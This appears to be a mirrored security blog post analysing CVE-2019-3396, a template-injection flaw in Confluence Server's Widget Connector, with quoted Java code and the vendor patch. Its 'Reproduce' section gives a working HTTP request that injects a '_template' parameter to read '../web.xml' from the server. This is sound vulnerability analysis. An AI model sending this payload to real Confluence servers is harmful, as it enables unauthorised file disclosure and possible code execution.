3

【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

 2 years ago
source link: https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Analysis

According to the document , there are three parameters that you can set to control the content or format of the macro output, including URL、Width and Height.

the Widget Connector has defind some renders. for example the FriendFeedRenderer:

public class FriendFeedRenderer implements WidgetRenderer
public String getEmbeddedHtml(String url, Map<String, String> params) {
params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
return this.velocityRenderService.render(getEmbedUrl(url), params);

In FriendFeedRenderer‘s getEmbeddedHtml function , you will see they put another option _template into params map.

However, some other renderers, such as in video category , just call render(getEmbedUrl(url), params) directly

So in this situation, we can "offer" the _template ourseleves which the backend will use the params to render

Reproduce

POST /rest/tinymce/1/macro/preview HTTP/1.1
{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

Patch

in fix version, it will call doSanitizeParameters before render html which will remove the _template in parameters. The code may like this:

public class WidgetMacro
extends BaseMacro
implements Macro, EditorImagePlaceholder
public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory)
this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
doSanitizeParameters(parameters);
return this.renderManager.getEmbeddedHtml(url, parameters);
private void doSanitizeParameters(Map<String, String> parameters)
Objects.requireNonNull(parameters);
for (String sanitizedParameter : this.sanitizeFields) {
parameters.remove(sanitizedParameter);



report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK